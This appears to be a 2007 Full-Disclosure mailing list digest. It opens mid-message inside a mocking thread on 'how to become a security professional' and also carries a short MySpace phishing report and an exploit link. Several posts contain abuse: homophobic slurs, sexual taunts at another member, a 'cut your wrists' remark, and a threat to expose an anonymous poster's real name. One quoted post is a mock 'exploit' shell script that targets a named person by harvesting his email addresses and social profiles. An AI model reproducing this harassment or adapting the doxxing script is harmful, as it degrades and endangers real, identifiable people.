and rule two or take whats said on public mailing lists
seriously. As
soon as you take what is said on a public mailing list seriously
is
the day you should cut your wrists.
He's getting so horny right now
Always get advice from a credible source after learning of a
threat on
the public mailing lists.
Like worried security?
Please tell me if you think the linux/tcp stack is currently
vulnerable.
I have N0 1D34
The forth most important rule to becoming a security
professional,
always use a throw-away e-mail account so it doesn't matter of
script
kids hi-jack your e-mail account with the next cross-site
scripting
vulnerablity that gets posted to the public mailing lists.
HIJACK THIS BITCH
The fifth most important rule to becoming a security
professional is
use an alias on public mailing lists, never use your real name,
place
of work, place of education, place of living, as backfires
cannot be
reversed. Once you've post something its post, archived around
the
world and translated into more languages than you can shake a
stick
at.
Y0u juzt m1ght be shirl0ck h0lm3z
The sixth most important rule to becoming a security
professional is
be paranoid. Yes, don't listen to people who say paranoia is bad
for
you. In this industry it pays to be paranoid. Forget about your
own
welfare, you've got millions of users and the economic stability
of
the world to think about. Trade in your own life to save the
life of
others. Indeed being a security professional will mean long
hours, and
sleepless nights. Be prepared to be woken up in the middle of
the
night and expect to have people shouting for answers down the
phone to
you or rush you into the security operations center when news of
a
major data breach reaches the inbox of your security team.
"Be prepared to be woken up in the middle of the
night and expect to have people shouting for answers down the
phone to
you or rush you into the security operations center when news of a
major data breach reaches the inbox of your security team."
This is what a professional at computer security undergoes?
I thought I could just, be in my bedroom reading about aix
security enhancements and win32 buffer overflow prevention methods
The seventh most important rule to becoming a security
professional.
Think for yourself don't post ridiculous questions to a public
mailing
list and expect to get the right answer, most folks will make
anything
up and people generally cannot be trusted. Use search engines,
read
books and free your mind from what other security researchers
are
doing. Don't duplicate, originate your own work.
He talks a whole lot about mailing lists
The eighth most important rule to becoming a good security
professional is have balls, if you think something is wrong,
don't be
affraid to speak up, even if it means losing your job. Remember,
the
security of other people comes before the security of your job
position. So if you think something is wrong, tell people about
it,
and if they don't listen, then keep repeating it over and over.
Never
give in and keep on trying to tell people about something you
believe
in. You are a slave to the security of others, you don't come
first
"they" do.
So what's wrong buddy?
Ninth most important rule to becoming a good security
professional.
Don't read public mailing lists, don't read security news sites,
and
don't read web logs about what other people think about
security. They
all suck, don't trust anyone in this world and don't believe the
hype.
99.9% of anything post in public is attention grabbing bullshit,
you
don't need it. Concentrate with whats going on within your own
company
and screw all the others. Only read these mediums if its related
to
what you're doing that day at work to fix a bug or thrawt a
security
incident. Don't read about what could happen, stick to with
whats
actually happening to you that day. Not what other people say is
going
to happen next week.
Tenth most important rule to becoming a security professional,
know
your enemy. Yes, get to know them, eavesdrop on them, send them
gifts
and make them feel special. Your enemy is the single most
important
person to you and your company's assets. If you don't know what
your
enemy is doing then you don't have security. Remember though,
don't
concetrate on other peoples enemies, concentrate on enemies for
your
company. Don't read websites that say they are your enemy,
because its
unlikely they really are. Your real enemies don't announce
themselves
often and are unlikely to make public announcements about it,
and the
ones that do are usually hoaxes.
Fuck, I couldn't read it all.. I got exhauzted
rchrafe.wordpress.com
------------------------------
Message: 13
Date: Tue, 20 Nov 2007 07:46:58 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
Professional ?
To: Richard Golodner <rgolodner () infratection com>
Cc: full-disclosure () lists grok org uk
Message-ID: <474282E2.50009 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Richard Golodner wrote:
Get a good job where you can find best security practices being
used
and learn from others who have been in the field. You will
develop your own
set of tools and ideas, but the concepts are almost always the
same. Defense
in depth is a good idea and it works.
11th most important rule. Never ever take advice that has ten
rules
about something they know nothing about.
N3TD3V, please go away. Come back under a different alias if
you
must but please STFU!
The guy wanted a serious answer and you broke many of your own
rules. Don't get your kilt all bunched up, just be serious for
once in your
net-sec career.
Richard Golodner
Infratection IT Services
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
You're so gay dude
------------------------------
Message: 14
Date: Tue, 20 Nov 2007 07:49:20 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
Professional ?
To: XSS Worm XSS Security Information Portal
<cross-site-scripting-security () xssworm com>
Cc: full-disclosure () lists grok org uk
Message-ID: <47428370.6050500 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
XSS Worm XSS Security Information Portal wrote:
#!/bin/sh
# 0day exploit for Paul Schmehl
# based on information provided by Paul Schmehl
# pauls () utdallas edu <mailto:pauls () utdallas edu>
#
echo pauls > /hack/edu/utdallas.edu/known.addresses
googledump.pl --email-addresses --context-links
--referers --extended-links -keywords
"Paul","Schmehl","utdallas.edu
<http://utdallas.edu>", "pauls@", "pauls () utdallas
","paul.schmehl@" --verbose
socialgrab.pl --known-address "pauls () utdallas edu
<mailto:pauls () utdallas edu>" --real-name "Paul Schmehl"
--tags=security,hacking,utdallas,vulnerability
--
search=facebook,youtube,live,myspace,igoogle,yahoo,netvouz,rojo,dig
g,bebo,ebay,blogger,wordpress
--verbose --dump-links
infopull.pl --pgp-search --whois --domaintools --usenet --
trackers
--irclog --mirrors --listserv --known-
addresses="pauls () utdallas edu
<mailto:pauls () utdallas edu>"
echo "Paul Schmehl" >> /hack/TO-DO/pauls.at.utdallas.dot.edu
# http://xssworm.com
HAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAH
AHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHA
HAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAA
On 11/19/07, *Paul Schmehl* <pauls () utdallas edu
<mailto:pauls () utdallas edu>> wrote:
--On November 19, 2007 3:34:23 AM +0000 worried security
<worriedsecurity () googlemail com
<mailto:worriedsecurity () googlemail com>> wrote:
>
> The forth most important rule to becoming a security
professional,
> always use a throw-away e-mail account so it doesn't
matter of
script
> kids hi-jack your e-mail account with the next cross-site
scripting
> vulnerablity that gets posted to the public mailing lists.
>
You forgot the most important rule of all. Pay no heed to
bozos
who post
anonymously and don't even have a job in security. Their
advice is
usually worth just as much as their reputation.
Paul Schmehl ( pauls () utdallas edu
<mailto:pauls () utdallas edu>)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
<http://www.utdallas.edu/ir/security/>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-
charter.html
<http://lists.grok.org.uk/full-disclosure-charter.html>
Hosted and sponsored by Secunia - http://secunia.com/
--
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher
mailto: vaj () nospam xssworm com <mailto:vaj () nospam xssworm com>
aim: XSS Cross Site
------
XSS Cross Site Scripting Attacks
Web 2.0 Application Security Information Blog (tm) 2007
http://www.XSSworm.com/
------
"Vaj, bella vaj.
------------------------------
Message: 15
Date: Mon, 19 Nov 2007 20:52:30 -0800
From: "Dancho Danchev" <dancho.danchev () gmail com>
Subject: [Full-disclosure] Large Scale MySpace Phishing Attack
To: full-disclosure () lists grok org uk
Message-ID:
<b787ce30711192052k34755398t7a9c2c3c1c98418 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1
In need of a "creative phishing campaign of the year"? Try this,
perhaps the largest phishing attack spoofing MySpace and
collecting
all the login details at a central location, that's been active
for
over a month, and continues to be. A Chinese phishing group has
come
up with legitimate looking MySpace profiles (profile.myspace.com)
in
the form of subdomains at their original .cn domains, and by doing
so
achieve its ultimate objective - establish trust through
typosquatting, remain beneath the security vendors radar by
comment
spamming the URLs inside MySpace, and obtain the login details of
everyone who got tricked.
Complete assessment in the form of domains and URLs participating,
as
well as the message used per domain for the internal comment spam
campaign, is available here :
http://ddanchev.blogspot.com/2007/11/large-scale-myspace-phishing-
attack.html
Regards,
Dancho
------------------------------
Message: 16
Date: Mon, 19 Nov 2007 23:25:04 -0500 (GMT-05:00)
From: Elazar Broad <elazarb () earthlink net>
Subject: Re: [Full-disclosure] Multiple stack-based buffer
overflows
in dxmsft.dll
To: "full-disclosure () lists grok org uk"
<full-disclosure () lists grok org uk>
Message-ID:
<22163281.1195532704914.JavaMail.root () elwamui-
rubis.atl.sa.earthlink.net>
Content-Type: text/plain; charset=UTF-8
I did not see this: http://www.milw0rm.com/exploits/4251, my
apologies, please ignore my last post...
------------------------------
Message: 17
Date: Tue, 20 Nov 2007 08:34:58 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] so gay huh?
To: Richard Golodner <rgolodner () infratection com>,
full-disclosure () lists grok org uk
Message-ID: <47428E22.5060807 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Richard Golodner wrote:
Please come and introduce yourself to me at any Info-Sec
conference
or convention so we can meet face to face. We will see what is
up then.
Richard Golodner
Mr Golodner,
I'm currently unaware as to why you want us to come and
meet
you at
an info-sec conference, or convention, things like defcon and HOPE
are
for the
utterly pathetic.
We don't know what to say, you're too funny to take seriously.
Never email us again, you piece of garbage.
rcbrafe
------------------------------
Message: 18
Date: Tue, 20 Nov 2007 08:57:18 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] so gay huh?
To: Richard Golodner <rgolodner () infratection com>,
full-disclosure () lists grok org uk
Message-ID: <4742935E.4060008 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Richard Golodner wrote:
You think those are professional conferences? Those are script
children parties for retards that can't get laid.
LOL -- Like my, RCHRAFE didn't know this.
Come to a Homeland
Security meeting
Our affiliates are members of several.
or a National Security briefing.
What about CTU ?
You can't even hide your
own identity properly.
..
You know who we are?
SHIT
We're going to die a sudden death!
I did not say I wanted to meet you.
That's too bad, I'm horny f0r y0u
What I am saying is that if you
are so tough, step and be a man.
/me stepz up & becomez 4 m4n
At least use your real name or I will begin
to publicize it for you if you would like.
Firstly: Richard Golodner i love pissing you off, it gets me off.
Secondly: Your post previously sometime ago made me cum all over
my
k3yb04rd: http://osdir.com/ml/network.nsp.cisco/2003-
08/msg00019.html
You probably don't know the difference between IGRP and EIGRP
routing
protocolz
What a loser, haha.
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
End of Full-Disclosure Digest, Vol 33, Issue 38
***********************************************
--
Click to begin your health care training online. Request info today.
http://tagline.hushmail.com/fc/Ioyw6h4fOHYjfAEobiMPrx3XchsUpwoPDFF8YRhkb8de1zUc0aerIM/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
| 
Intro
